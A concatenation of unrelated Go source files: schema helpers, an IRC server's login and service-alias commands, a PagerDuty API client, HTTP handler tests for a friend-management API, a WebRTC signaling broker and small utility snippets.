if ctime := fi.Ctime_ns; ctime != 0 && fi.Mtime_ns != fi.Ctime_ns {
m["unixCtime"] = RFC3339FromNanos(ctime)
}
return m
}
func PopulateParts(m map[string]interface{}, size int64, parts []BytesPart) os.Error {
sumSize := int64(0)
mparts := make([]map[string]interface{}, len(parts))
for idx, part := range parts {
mpart := make(map[string]interface{})
mparts[idx] = mpart
switch {
case part.BlobRef != nil && part.BytesRef != nil:
return os.NewError("schema: part contains both blobRef and bytesRef")
case part.BlobRef != nil:
mpart["blobRef"] = part.BlobRef.String()
case part.BytesRef != nil:
mpart["bytesRef"] = part.BytesRef.String()
}
mpart["size"] = part.Size
sumSize += int64(part.Size)
if part.Offset != 0 {
mpart["offset"] = part.Offset
}
}
if sumSize != size {
return fmt.Errorf("schema: declared size %d doesn't match sum of parts size %d", size, sumSize)
}
m["parts"] = mparts
return nil
}
func PopulateSymlinkMap(m map[string]interface{}, fileName string) os.Error {
m["camliType"] = "symlink"
target, err := os.Readlink(fileName)
if err != nil {
return err
}
if isValidUtf8(target) {
m["symlinkTarget"] = target
} else {
m["symlinkTargetBytes"] = []uint8(target)
}
return nil
}
func NewBytes() map[string]interface{} {
return newCamliMap(1, "bytes")
}
func PopulateDirectoryMap(m map[string]interface{}, staticSetRef *blobref.BlobRef) {
m["camliType"] = "directory"
m["entries"] = staticSetRef.String()
}
func NewShareRef(authType string, target *blobref.BlobRef, transitive bool) map[string]interface{} {
m := newCamliMap(1, "share")
m["authType"] = authType
m["target"] = target.String()
m["transitive"] = transitive
return m
}
func NewClaim(permaNode *blobref.BlobRef, claimType string) map[string]interface{} {
m := newCamliMap(1, "claim")
m["permaNode"] = permaNode.String()
m["claimType"] = claimType
m["claimDate"] = RFC3339FromNanos(time.Nanoseconds())
return m
}
func newAttrChangeClaim(permaNode *blobref.BlobRef, claimType, attr, value string) map[string]interface{} {
m := NewClaim(permaNode, claimType)
m["attribute"] = attr
m["value"] = value
return m
}
func NewSetAttributeClaim(permaNode *blobref.BlobRef, attr, value string) map[string]interface{} {
return newAttrChangeClaim(permaNode, "set-attribute", attr, value)
}
func NewAddAttributeClaim(permaNode *blobref.BlobRef, attr, value string) map[string]interface{} {
return newAttrChangeClaim(permaNode, "add-attribute", attr, value)
}
func NewDelAttributeClaim(permaNode *blobref.BlobRef, attr string) map[string]interface{} {
m := newAttrChangeClaim(permaNode, "del-attribute", attr, "")
m["value"] = "", false
return m
}
// Types of ShareRefs
const ShareHaveRef = "haveref"
func RFC3339FromNanos(epochnanos int64) string {
nanos := epochnanos % 1e9
esec := epochnanos / 1e9
t := time.SecondsToUTC(esec)
timeStr := t.Format(time.RFC3339)
if nanos == 0 {
return timeStr
}
nanoStr := fmt.Sprintf("%09d", nanos)
nanoStr = strings.TrimRight(nanoStr, "0")
return timeStr[:len(timeStr)-1] + "." + nanoStr + "Z"
}
func NanosFromRFC3339(timestr string) int64 {
dotpos := strings.Index(timestr, ".")
simple3339 := timestr
nanostr := ""
if dotpos != -1 {
if !strings.HasSuffix(timestr, "Z") {
return -1
}
simple3339 = timestr[:dotpos] + "Z"
nanostr = timestr[dotpos+1 : len(timestr)-1]
if needDigits := 9 - len(nanostr); needDigits > 0 {
nanostr = nanostr + "000000000"[:needDigits]
}
}
t, err := time.Parse(time.RFC3339, simple3339)
if err != nil {
return -1
}
nanos, _ := strconv.Atoi64(nanostr)
return t.Seconds()*1e9 + nanos
}
func populateMap(m map[int]string, file string) {
f, err := os.Open(file)
if err != nil {
return
}
bufr := bufio.NewReader(f)
for {
line, err := bufr.ReadString('\n')
if err != nil {
return
}
parts := strings.SplitN(line, ":", 4)
if len(parts) >= 3 {
idstr := parts[2]
id, err := strconv.Atoi(idstr)
if err == nil {
m[id] = parts[0]
}
}
}
}
var uidToUsernameMap map[int]string
var getUserFromUidOnce sync.Once
func getUserFromUid(uid int) string {
getUserFromUidOnce.Do(func() {
uidToUsernameMap = make(map[int]string)
populateMap(uidToUsernameMap, "/etc/passwd")
})
return uidToUsernameMap[uid]
}
var gidToUsernameMap map[int]string
var getGroupFromGidOnce sync.Once
func getGroupFromGid(uid int) string {
getGroupFromGidOnce.Do(func() {
gidToUsernameMap = make(map[int]string)
populateMap(gidToUsernameMap, "/etc/group")
})
return gidToUsernameMap[uid]
}
func isValidUtf8(s string) bool {
for _, rune := range []int(s) {
if rune == 0xfffd {
return false
}
}
return true
}
|
package ircserver
import (
"fmt"
"os"
"strings"
"github.com/prometheus/client_golang/prometheus"
"gopkg.in/sorcix/irc.v2"
)
var (
captchaChallengesSent = prometheus.NewCounter(
prometheus.CounterOpts{
Subsystem: "captcha",
Name: "challenges_sent",
Help: "Number of CAPTCHA challenges generated and sent to users",
},
)
Commands = make(map[string]*ircCommand)
)
type ircCommand struct {
Func func(*IRCServer, *Session, *Replyctx, *irc.Message)
// MinParams ensures that enough parameters were specified.
// irc.ERR_NEEDMOREPARAMS is returned in case less than MinParams
// parameters were found, otherwise, Func is called.
MinParams int
}
func init() {
prometheus.MustRegister(captchaChallengesSent)
serviceAlias := &ircCommand{
Func: (*IRCServer).cmdServiceAlias,
}
Commands["NICKSERV"] = serviceAlias
Commands["CHANSERV"] = serviceAlias
Commands["OPERSERV"] = serviceAlias
Commands["MEMOSERV"] = serviceAlias
Commands["HOSTSERV"] = serviceAlias
Commands["BOTSERV"] = serviceAlias
Commands["NS"] = serviceAlias
Commands["CS"] = serviceAlias
Commands["OS"] = serviceAlias
Commands["MS"] = serviceAlias
Commands["HS"] = serviceAlias
Commands["BS"] = serviceAlias
if os.Getenv("ROBUSTIRC_TESTING_ENABLE_PANIC_COMMAND") == "1" {
Commands["PANIC"] = &ircCommand{
Func: func(i *IRCServer, s *Session, reply *Replyctx, msg *irc.Message) {
panic("PANIC called")
},
}
}
}
// login is called by either cmdNick or cmdUser, depending on which message the
// client sends last.
func (i *IRCServer) maybeLogin(s *Session, reply *Replyctx, msg *irc.Message) {
if s.loggedIn {
return
}
if s.Nick == "" || s.Username == "" {
return
}
if i.captchaRequiredForLogin() {
captcha := extractPassword(s.Pass, "captcha")
if err := i.verifyCaptcha(s, captcha); err != nil {
captchaUrl := i.generateCaptchaURL(s, fmt.Sprintf("login:%d:", s.LastActivity.UnixNano()))
i.sendUser(s, reply, &irc.Message{
Prefix: i.ServerPrefix,
Command: irc.NOTICE,
Params: []string{s.Nick, "To login, please go to " + captchaUrl},
})
captchaChallengesSent.Inc()
return
}
}
s.loggedIn = true
i.sendUser(s, reply, &irc.Message{
Prefix: i.ServerPrefix,
Command: irc.RPL_WELCOME,
Params: []string{s.Nick, "Welcome to RobustIRC!"},
})
i.sendUser(s, reply, &irc.Message{
Prefix: i.ServerPrefix,
Command: irc.RPL_YOURHOST,
Params: []string{s.Nick, "Your host is " + i.ServerPrefix.Name},
})
i.sendUser(s, reply, &irc.Message{
Prefix: i.ServerPrefix,
Command: irc.RPL_CREATED,
Params: []string{s.Nick, "This server was created " + i.ServerCreation.UTC().String()},
})
i.sendUser(s, reply, &irc.Message{
Prefix: i.ServerPrefix,
Command: irc.RPL_MYINFO,
Params: []string{s.Nick, i.ServerPrefix.Name + " v1 i nstix"},
})
// send ISUPPORT as per:
// http://www.irc.org/tech_docs/draft-brocklesby-irc-isupport-03.txt
// http://www.irc.org/tech_docs/005.html
i.sendUser(s, reply, &irc.Message{
Prefix: i.ServerPrefix,
Command: "005",
Params: []string{
"CHANTYPES=#",
"CHANNELLEN=" + maxChannelLen,
"NICKLEN=" + maxNickLen,
"MODES=1",
"PREFIX=(o)@",
"KNOCK",
"are supported by this server",
},
})
i.sendServices(reply, &irc.Message{
Command: irc.NICK,
Params: []string{
s.Nick,
"1", // hopcount (ignored by anope)
"1", // timestamp
s.Username,
s.ircPrefix.Host,
i.ServerPrefix.Name,
s.svid,
"+",
s.Realname,
},
})
if pass := extractPassword(s.Pass, "nickserv"); pass != "" {
i.sendServices(reply, &irc.Message{
Prefix: &s.ircPrefix,
Command: irc.PRIVMSG,
Params: []string{"NickServ", fmt.Sprintf("IDENTIFY %s", pass)},
})
}
if pass := extractPassword(s.Pass, "oper"); pass != "" {
parsed := irc.ParseMessage("OPER " + pass)
if len(parsed.Params) > 1 {
i.cmdOper(s, reply, parsed)
}
}
// In the interest of privacy, clear the password to make
// accidental leaks less likely.
s.Pass = ""
i.cmdMotd(s, reply, msg)
}
func (i *IRCServer) cmdServiceAlias(s *Session, reply *Replyctx, msg *irc.Message) {
aliases := map[string]string{
"NICKSERV": "PRIVMSG NickServ :",
"NS": "PRIVMSG NickServ :",
"CHANSERV": "PRIVMSG ChanServ :",
"CS": "PRIVMSG ChanServ :",
"OPERSERV": "PRIVMSG OperServ :",
"OS": "PRIVMSG OperServ :",
"MEMOSERV": "PRIVMSG MemoServ :",
"MS": "PRIVMSG MemoServ :",
"HOSTSERV": "PRIVMSG HostServ :",
"HS": "PRIVMSG HostServ :",
"BOTSERV": "PRIVMSG BotServ :",
"BS": "PRIVMSG BotServ :",
}
for alias, expanded := range aliases {
if strings.ToUpper(msg.Command) != alias {
continue
}
i.cmdPrivmsg(s, reply, irc.ParseMessage(expanded+strings.Join(msg.Params, " ")))
return
}
}
|
package api
import (
"time"
"github.com/PagerDuty/go-pagerduty"
)
var Client *PagerDutyClient
type PagerDutyClient struct {
apiClient *pagerduty.Client
}
type ScheduleInfo struct {
ID string
Name string
Location *time.Location
Start time.Time
End time.Time
FinalSchedule pagerduty.ScheduleLayer
}
type UserRotaPeriod struct {
Start time.Time
End time.Time
}
type UserRotaInfo struct {
ID string
Name string
Periods []*UserRotaPeriod
}
type ScheduleUserRotationData map[string]*UserRotaInfo
func InitialisePagerDutyAPIClient(authToken string) {
Client = &PagerDutyClient{
apiClient: pagerduty.NewClient(authToken),
}
}
func (p *PagerDutyClient) ListSchedules() ([]pagerduty.Schedule, error) {
var schedules []pagerduty.Schedule
var opts pagerduty.ListSchedulesOptions
more := true
for ;more; {
listSchedulesResponse, err := p.apiClient.ListSchedules(opts)
if err != nil {
return nil, err
}
for _, schedule := range listSchedulesResponse.Schedules {
schedules = append(schedules, schedule)
}
more = listSchedulesResponse.More
opts.Offset = listSchedulesResponse.Limit
}
return schedules, nil
}
func (p *PagerDutyClient) ListServices(teamID string) ([]pagerduty.Service, error) {
var opts pagerduty.ListServiceOptions
opts.TeamIDs = []string{teamID}
listServicesResponse, err := p.apiClient.ListServices(opts)
if err != nil {
return nil, err
}
return listServicesResponse.Services, nil
}
func (p *PagerDutyClient) ListTeams() ([]pagerduty.Team, error) {
var opts pagerduty.ListTeamOptions
listTeamsResponse, err := p.apiClient.ListTeams(opts)
if err != nil {
return nil, err
}
return listTeamsResponse.Teams, nil
}
func (p *PagerDutyClient) ListUsers() ([]pagerduty.User, error) {
var opts pagerduty.ListUsersOptions
listUsersResponse, err := p.apiClient.ListUsers(opts)
if err != nil {
return nil, err
}
return listUsersResponse.Users, nil
}
func (p *PagerDutyClient) GetUserById(id string) (*pagerduty.User, error) {
return p.apiClient.GetUser(id, pagerduty.GetUserOptions{})
}
func (p *PagerDutyClient) GetSchedule(scheduleID, startDate, endDate string) (*pagerduty.Schedule, error) {
var opts pagerduty.GetScheduleOptions
opts.Since = startDate
opts.Until = endDate
scheduleResponse, err := p.apiClient.GetSchedule(scheduleID, opts)
if err != nil {
return nil, err
}
return scheduleResponse, nil
}
|
package main
type PatientHistory struct {
PatientId string `json:"PatientId"`
MedicalRecords []MedicalRecord `json:"MedicalRecords"`
}
|
package rest_api
import (
"bytes"
"context"
"errors"
"github.com/go-chi/chi"
"github.com/stretchr/testify/mock"
"github.com/stretchr/testify/require"
"go-friend-mgmt/cmd/internal/services/mocks"
"go-friend-mgmt/cmd/internal/services/models"
"net/http"
"net/http/httptest"
"testing"
)
func TestCreateConnectionFriend(t *testing.T) {
var jsonStr = []byte(`{"friends":["andy@example","john@example.com"]}`)
var jsonStr2 = []byte(`{"friends":[andy@example]}`)
testCase:=[]struct{
name string
bodyRequest *bytes.Buffer
expectedCode int
expectedBody string
mockresponse models.Response
mockError error
}{
{
name:"success",
bodyRequest: bytes.NewBuffer(jsonStr),
mockresponse: models.Response{
Success: true,
},
expectedCode: 200,
expectedBody: "{\"success\":true}\n",
},
{
name: "create failed by CreateConnectionFriend error",
bodyRequest: bytes.NewBuffer(jsonStr),
mockresponse: models.Response{
Success: false,
},
mockError: errors.New("db error"),
expectedCode: 500,
expectedBody: "{\"statusCode\":500,\"message\":\"db error\"}\n",
},
{
name: "retrieve failed by incorrect input",
bodyRequest: bytes.NewBuffer(jsonStr2),
expectedCode: 400,
expectedBody: "{\"statusCode\":400,\"message\":\"Bad request\"}\n",
},
}
for _,tt:=range testCase{
t.Run(tt.name, func(t *testing.T){
req, err:=http.NewRequest(http.MethodPost,"/user/makefriend", tt.bodyRequest)
req.Header.Set("X-Custom-Header","myvalue")
req.Header.Set("Content-Type", "application/json")
require.NoError(t,err)
router:=chi.NewRouter()
req=req.WithContext(context.WithValue(req.Context(),chi.RouteCtxKey,router))
rr:=httptest.NewRecorder()
serviceMock:=new(mocks.ServiceMock)
serviceMock.On("CreateConnectionFriend", mock.Anything,mock.Anything).Return(tt.mockresponse,tt.mockError)
handler:=CreateConnectionFriend(serviceMock)
handler.ServeHTTP(rr, req)
require.Equal(t, tt.expectedCode, rr.Code)
require.Equal(t, tt.expectedBody, rr.Body.String())
})
}
}
func TestReceiveFriendListByEmail(t *testing.T) {
var jsonStr = []byte(`{"email":"andy@example"}`)
var jsonStr2 = []byte(`{"email":andy@example}`)
testCase:=[]struct{
name string
bodyRequest *bytes.Buffer
expectedCode int
expectedBody string
mockresponse models.ResponseFriend
mockError error
}{
{
name:"success",
bodyRequest: bytes.NewBuffer(jsonStr),
mockresponse: models.ResponseFriend{
Success: true,
Friends: []string{"andy@gmail.com","david@gmail.com"},
Count: 2,
},
expectedCode: 200,
expectedBody: "{\"success\":true,\"friends\":[\"andy@gmail.com\",\"david@gmail.com\"],\"count\":2}\n",
},
{
name: "create failed by ReceiveFriendListByEmail error",
bodyRequest: bytes.NewBuffer(jsonStr),
mockresponse: models.ResponseFriend{
Success: false,
},
mockError: errors.New("db error"),
expectedCode: 500,
expectedBody: "{\"statusCode\":500,\"message\":\"db error\"}\n",
},
{
name: "retrieve failed by incorrect input",
bodyRequest: bytes.NewBuffer(jsonStr2),
expectedCode: 400,
expectedBody: "{\"statusCode\":400,\"message\":\"Bad request\"}\n",
},
}
for _,tt:=range testCase{
t.Run(tt.name, func(t *testing.T){
req, err:=http.NewRequest(http.MethodPost,"/user/friends", tt.bodyRequest)
req.Header.Set("X-Custom-Header","myvalue")
req.Header.Set("Content-Type", "application/json")
require.NoError(t,err)
router:=chi.NewRouter()
req=req.WithContext(context.WithValue(req.Context(),chi.RouteCtxKey,router))
rr:=httptest.NewRecorder()
serviceMock:=new(mocks.ServiceMock)
serviceMock.On("ReceiveFriendListByEmail", mock.Anything,mock.Anything).Return(tt.mockresponse,tt.mockError)
handler:=ReceiveFriendListByEmail(serviceMock)
handler.ServeHTTP(rr, req)
require.Equal(t, tt.expectedCode, rr.Code)
require.Equal(t, tt.expectedBody, rr.Body.String())
})
}
}
func TestReceiveCommonFriendList(t *testing.T) {
var jsonStr = []byte(`{"friends":["andy@example","john@example.com"]}`)
var jsonStr2 = []byte(`{"friends":[andy@example,"john@example.com"]}`)
testCase:=[]struct{
name string
bodyRequest *bytes.Buffer
expectedCode int
expectedBody string
mockresponse models.ResponseFriend
mockError error
}{
{
name:"success",
bodyRequest: bytes.NewBuffer(jsonStr),
mockresponse: models.ResponseFriend{
Success: true,
Friends: []string{"andy@gmail.com","david@gmail.com"},
Count: 2,
},
expectedCode: 200,
expectedBody: "{\"success\":true,\"friends\":[\"andy@gmail.com\",\"david@gmail.com\"],\"count\":2}\n",
},
{
name: "create failed by ReceiveCommonFriendList error",
bodyRequest: bytes.NewBuffer(jsonStr),
mockresponse: models.ResponseFriend{
Success: false,
},
mockError: errors.New("db error"),
expectedCode: 500,
expectedBody: "{\"statusCode\":500,\"message\":\"db error\"}\n",
},
{
name: "retrieve failed by incorrect input",
bodyRequest: bytes.NewBuffer(jsonStr2),
expectedCode: 400,
expectedBody: "{\"statusCode\":400,\"message\":\"Bad request\"}\n",
},
}
for _,tt:=range testCase{
t.Run(tt.name, func(t *testing.T){
req, err:=http.NewRequest(http.MethodPost,"/user/commonfriends", tt.bodyRequest)
req.Header.Set("X-Custom-Header","myvalue")
req.Header.Set("Content-Type", "application/json")
require.NoError(t,err)
router:=chi.NewRouter()
req=req.WithContext(context.WithValue(req.Context(),chi.RouteCtxKey,router))
rr:=httptest.NewRecorder()
serviceMock:=new(mocks.ServiceMock)
serviceMock.On("ReceiveCommonFriendList", mock.Anything,mock.Anything).Return(tt.mockresponse,tt.mockError)
handler:=ReceiveCommonFriendList(serviceMock)
handler.ServeHTTP(rr, req)
require.Equal(t, tt.expectedCode, rr.Code)
require.Equal(t, tt.expectedBody, rr.Body.String())
})
}
}
func TestSubscribeUpdateFromEmail(t *testing.T) {
var jsonStr = []byte(`{"requestor":"andy@example","target":"john@example"}`)
var jsonStr2 = []byte(`{"requestor":andy@example,"target":"john@example"}`)
testCase:=[]struct{
name string
bodyRequest *bytes.Buffer
expectedCode int
expectedBody string
mockresponse models.Response
mockError error
}{
{
name:"success",
bodyRequest: bytes.NewBuffer(jsonStr),
mockresponse: models.Response{
Success: true,
},
expectedCode: 200,
expectedBody: "{\"success\":true}\n",
},
{
name: "create failed by SubscribeUpdateFromEmail error",
bodyRequest: bytes.NewBuffer(jsonStr),
mockresponse: models.Response{
Success: false,
},
mockError: errors.New("db error"),
expectedCode: 500,
expectedBody: "{\"statusCode\":500,\"message\":\"db error\"}\n",
},
{
name: "retrieve failed by incorrect input",
bodyRequest: bytes.NewBuffer(jsonStr2),
expectedCode: 400,
expectedBody: "{\"statusCode\":400,\"message\":\"Bad request\"}\n",
},
}
for _,tt:=range testCase{
t.Run(tt.name, func(t *testing.T){
req, err:=http.NewRequest(http.MethodPost,"/user/subscribe", tt.bodyRequest)
req.Header.Set("X-Custom-Header","myvalue")
req.Header.Set("Content-Type", "application/json")
require.NoError(t,err)
router:=chi.NewRouter()
req=req.WithContext(context.WithValue(req.Context(),chi.RouteCtxKey,router))
rr:=httptest.NewRecorder()
serviceMock:=new(mocks.ServiceMock)
serviceMock.On("SubscribeUpdateFromEmail", mock.Anything,mock.Anything).Return(tt.mockresponse,tt.mockError)
handler:=SubscribeUpdateFromEmail(serviceMock)
handler.ServeHTTP(rr, req)
require.Equal(t, tt.expectedCode, rr.Code)
require.Equal(t, tt.expectedBody, rr.Body.String())
})
}
}
func TestBlockUpdateFromEmail(t *testing.T) {
var jsonStr = []byte(`{"requestor":"andy@example","target":"john@example"}`)
var jsonStr2 = []byte(`{"requestor":andy@example,"target":"john@example"}`)
testCase:=[]struct{
name string
bodyRequest *bytes.Buffer
expectedCode int
expectedBody string
mockresponse models.Response
mockError error
}{
{
name:"success",
bodyRequest: bytes.NewBuffer(jsonStr),
mockresponse: models.Response{
Success: true,
},
expectedCode: 200,
expectedBody: "{\"success\":true}\n",
},
{
name: "create failed by SubscribeUpdateFromEmail error",
bodyRequest: bytes.NewBuffer(jsonStr),
mockresponse: models.Response{
Success: false,
},
mockError: errors.New("db error"),
expectedCode: 500,
expectedBody: "{\"statusCode\":500,\"message\":\"db error\"}\n",
},
{
name: "retrieve failed by incorrect input",
bodyRequest: bytes.NewBuffer(jsonStr2),
expectedCode: 400,
expectedBody: "{\"statusCode\":400,\"message\":\"Bad request\"}\n",
},
}
for _,tt:=range testCase{
t.Run(tt.name, func(t *testing.T){
req, err:=http.NewRequest(http.MethodPost,"/user/block", tt.bodyRequest)
req.Header.Set("X-Custom-Header","myvalue")
req.Header.Set("Content-Type", "application/json")
require.NoError(t,err)
router:=chi.NewRouter()
req=req.WithContext(context.WithValue(req.Context(),chi.RouteCtxKey,router))
rr:=httptest.NewRecorder()
serviceMock:=new(mocks.ServiceMock)
serviceMock.On("BlockUpdateFromEmail", mock.Anything,mock.Anything).Return(tt.mockresponse,tt.mockError)
handler:=BlockUpdateFromEmail(serviceMock)
handler.ServeHTTP(rr, req)
require.Equal(t, tt.expectedCode, rr.Code)
require.Equal(t, tt.expectedBody, rr.Body.String())
})
}
}
func TestGetAllSubscribeUpdateByEmail(t *testing.T) {
var jsonStr = []byte(`{"sender":"andy@example","text":"Hello World! kate@example.com"}`)
var jsonStr2 = []byte(`{"sender":andy@example,"text":"Hello World! kate@example.com"}`)
testCase:=[]struct{
name string
bodyRequest *bytes.Buffer
expectedCode int
expectedBody string
mockresponse models.SubscribeResponse
mockError error
}{
{
name:"success",
bodyRequest: bytes.NewBuffer(jsonStr),
mockresponse: models.SubscribeResponse{
Success: true,
Recipients: []string{"andy@example","kate@example.com"},
},
expectedCode: 200,
expectedBody: "{\"success\":true,\"recipients\":[\"andy@example\",\"kate@example.com\"]}\n",
},
{
name: "create failed by SubscribeUpdateFromEmail error",
bodyRequest: bytes.NewBuffer(jsonStr),
mockresponse: models.SubscribeResponse{
Success: false,
},
mockError: errors.New("db error"),
expectedCode: 500,
expectedBody: "{\"statusCode\":500,\"message\":\"db error\"}\n",
},
{
name: "retrieve failed by incorrect input",
bodyRequest: bytes.NewBuffer(jsonStr2),
expectedCode: 400,
expectedBody: "{\"statusCode\":400,\"message\":\"Bad request\"}\n",
},
}
for _,tt:=range testCase{
t.Run(tt.name, func(t *testing.T){
req, err:=http.NewRequest(http.MethodPost,"/user/emailssubscribe", tt.bodyRequest)
req.Header.Set("X-Custom-Header","myvalue")
req.Header.Set("Content-Type", "application/json")
require.NoError(t,err)
router:=chi.NewRouter()
req=req.WithContext(context.WithValue(req.Context(),chi.RouteCtxKey,router))
rr:=httptest.NewRecorder()
serviceMock:=new(mocks.ServiceMock)
serviceMock.On("GetAllSubscribeUpdateByEmail", mock.Anything,mock.Anything).Return(tt.mockresponse,tt.mockError)
handler:=GetAllSubscribeUpdateByEmail(serviceMock)
handler.ServeHTTP(rr, req)
require.Equal(t, tt.expectedCode, rr.Code)
require.Equal(t, tt.expectedBody, rr.Body.String())
})
}
}
|
package test
import (
"testing"
)
func TestDes(t *testing.T) {
key := []byte("LKHlhb899Y09olUi")
// encryptMsg, err := encrypt(key, "Hello World")
// if err != nil {
// t.Error(err)
// } else {
// fmt.Println(encryptMsg)
// }
// msg, _ := decrypt(key, encryptMsg)
// fmt.Println(msg) // Hello World
// s := 6300
// i64, _ := strconv.ParseInt(strconv.Itoa(s), 10, 64)
// fmt.Print(i64)
}
// $2a$10$o69KkDrtSuM9ER1QLv3CO.Wd0DwPxWUsekUO1.jnxhFau/8D7OYbi
// $2a$10$KpCqOj7ao1SpHHMXkqvk.uA30HyodcinAsJuXcenIkwOg67QAuBcC |
package main
import "fmt"
func main() {
/*
Example of If and if else
In this program we print given number is less than 5 print Hi else print Bye
*/
exampleIf()
exampleIfElse()
oddEven() // --> checks number is even or odd
}
func exampleIf() {
number := 4
if number <= 5 {
fmt.Println("Hi")
} else {
fmt.Println("Bye")
}
}
func exampleIfElse() {
number := 1
if number == 1 {
fmt.Println("ONE")
} else if number == 2 {
fmt.Println("TWO")
} else {
fmt.Println("default else")
}
}
func oddEven() {
num := 11
if num%2 == 0 {
fmt.Println("Even")
} else {
fmt.Println("Odd")
}
}
|
package main
import (
"os"
"path/filepath"
"syscall"
"github.com/fd/forklift/util/user"
)
func user_exec() {
home, err := user.Home()
if err != nil {
return
}
path := filepath.Join(home, ".forklift", "bin", "forklift")
_, err = os.Stat(path)
if err != nil {
return
}
if os.Args[0] == path {
return
}
os.Args[0] = path
syscall.Exec(path, os.Args, os.Environ())
}
|
/*
Broker acts as the HTTP signaling channel.
It matches clients and snowflake proxies by passing corresponding
SessionDescriptions in order to negotiate a WebRTC connection.
TODO(serene): This code is currently the absolute minimum required to
cause a successful negotiation.
It's otherwise very unsafe and problematic, and needs quite some work...
*/
package snowflake_broker
import (
"container/heap"
"io/ioutil"
"log"
"net"
"net/http"
"time"
)
const (
ClientTimeout = 10
ProxyTimeout = 10
)
// This is minimum viable client-proxy registration.
// TODO(#13): better, more secure registration corresponding to what's in
// the python flashproxy facilitator.
var snowflakes *SnowflakeHeap
// Map keeping track of snowflakeIDs required to match SDP answers from
// the second http POST.
var snowflakeMap map[string]*Snowflake
// Create and add a Snowflake to the heap.
func AddSnowflake(id string) *Snowflake {
snowflake := new(Snowflake)
snowflake.id = id
snowflake.clients = 0
snowflake.offerChannel = make(chan []byte)
snowflake.answerChannel = make(chan []byte)
heap.Push(snowflakes, snowflake)
snowflakeMap[id] = snowflake
return snowflake
}
func robotsTxtHandler(w http.ResponseWriter, r *http.Request) {
w.Header().Set("Content-Type", "text/plain; charset=utf-8")
w.Write([]byte("User-agent: *\nDisallow:\n"))
}
func ipHandler(w http.ResponseWriter, r *http.Request) {
remoteAddr := r.RemoteAddr
if net.ParseIP(remoteAddr).To4() == nil {
remoteAddr = "[" + remoteAddr + "]"
}
w.Header().Set("Content-Type", "text/plain; charset=utf-8")
w.Write([]byte(remoteAddr))
}
// Return early if it's CORS preflight.
func isPreflight(w http.ResponseWriter, r *http.Request) bool {
w.Header().Set("Access-Control-Allow-Origin", "*")
w.Header().Set("Access-Control-Allow-Headers", "Origin, X-Session-ID")
if "OPTIONS" == r.Method {
return true
}
return false
}
/*
Expects a WebRTC SDP offer in the Request to give to an assigned
snowflake proxy, which responds with the SDP answer to be sent in
the HTTP response back to the client.
*/
func clientHandler(w http.ResponseWriter, r *http.Request) {
offer, err := ioutil.ReadAll(r.Body)
if nil != err {
log.Println("Invalid data.")
w.WriteHeader(http.StatusBadRequest)
return
}
w.Header().Set("Access-Control-Allow-Origin", "*")
w.Header().Set("Access-Control-Allow-Headers", "X-Session-ID")
// Find the most available snowflake proxy, and pass the offer to it.
// TODO: Needs improvement - maybe shouldn'
snowflake := heap.Pop(snowflakes).(*Snowflake)
if nil == snowflake {
w.WriteHeader(http.StatusServiceUnavailable)
// w.Write([]byte("no snowflake proxies available"))
return
}
snowflake.offerChannel <- offer
// Wait for the answer to be returned on the channel.
select {
case answer := <-snowflake.answerChannel:
log.Println("Retrieving answer")
w.Write(answer)
// Only remove from the snowflake map once the answer is set.
delete(snowflakeMap, snowflake.id)
case <-time.After(time.Second * ClientTimeout):
w.WriteHeader(http.StatusGatewayTimeout)
w.Write([]byte("timed out waiting for answer!"))
}
}
/*
For snowflake proxies to request a client from the Broker.
*/
func proxyHandler(w http.ResponseWriter, r *http.Request) {
if isPreflight(w, r) {
return
}
id := r.Header.Get("X-Session-ID")
body, err := ioutil.ReadAll(r.Body)
if nil != err {
log.Println("Invalid data.")
w.WriteHeader(http.StatusBadRequest)
return
}
if string(body) != id { // Mismatched IDs!
w.WriteHeader(http.StatusBadRequest)
}
// Maybe confirm that X-Session-ID is the same.
log.Println("Received snowflake: ", id)
snowflake := AddSnowflake(id)
// Wait for a client to avail an offer to the snowflake, or timeout
// and ask the snowflake to poll later.
select {
case offer := <-snowflake.offerChannel:
log.Println("Passing client offer to snowflake.")
w.Write(offer)
case <-time.After(time.Second * ProxyTimeout):
// This snowflake is no longer available to serve clients.
heap.Remove(snowflakes, snowflake.index)
delete(snowflakeMap, snowflake.id)
w.WriteHeader(http.StatusGatewayTimeout)
}
}
/*
Expects snowflake proxes which have previously successfully received
an offer from proxyHandler to respond with an answer in an HTTP POST,
which the broker will pass back to the original client.
*/
func answerHandler(w http.ResponseWriter, r *http.Request) {
if isPreflight(w, r) {
return
}
id := r.Header.Get("X-Session-ID")
snowflake, ok := snowflakeMap[id]
if !ok || nil == snowflake {
// The snowflake took too long to respond with an answer,
// and the designated client is no longer around / recognized by the Broker.
w.WriteHeader(http.StatusGone)
return
}
body, err := ioutil.ReadAll(r.Body)
if nil != err {
log.Println("Invalid data.")
w.WriteHeader(http.StatusBadRequest)
return
}
log.Println("Received answer: ", body)
snowflake.answerChannel <- body
}
func init() {
snowflakes = new(SnowflakeHeap)
snowflakeMap = make(map[string]*Snowflake)
heap.Init(snowflakes)
http.HandleFunc("/robots.txt", robotsTxtHandler)
http.HandleFunc("/ip", ipHandler)
http.HandleFunc("/client", clientHandler)
http.HandleFunc("/proxy", proxyHandler)
http.HandleFunc("/answer", answerHandler)
}
|
// Copyright 2015 PingCAP, Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// #nosec G404
package ddltest
import (
"math/rand"
)
func randomInt() int {
return rand.Int()
}
func randomIntn(n int) int {
return rand.Intn(n)
}
func randomFloat() float64 {
return rand.Float64()
}
func randomString(n int) string {
const alphanum = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
var bytes = make([]byte, n)
for i := range bytes {
bytes[i] = alphanum[randomIntn(len(alphanum))]
}
return string(bytes)
}
// Args
// 0 -> min
// 1 -> max
// randomNum(1,10) -> [1,10)
// randomNum(-1) -> random
// randomNum() -> random
func randomNum(args ...int) int {
if len(args) > 1 {
return args[0] + randomIntn(args[1]-args[0])
} else if len(args) == 1 {
return randomIntn(args[0])
} else {
return randomInt()
}
}
|
// Copyright 2015 Nevio Vesic
// Please check out LICENSE file for more information about what you CAN and what you CANNOT do!
// Basically in short this is a free software for you to do whatever you want to do BUT copyright must be included!
// I didn't write all of this code so you could say it's yours.
// MIT License
package goesl
import "context"
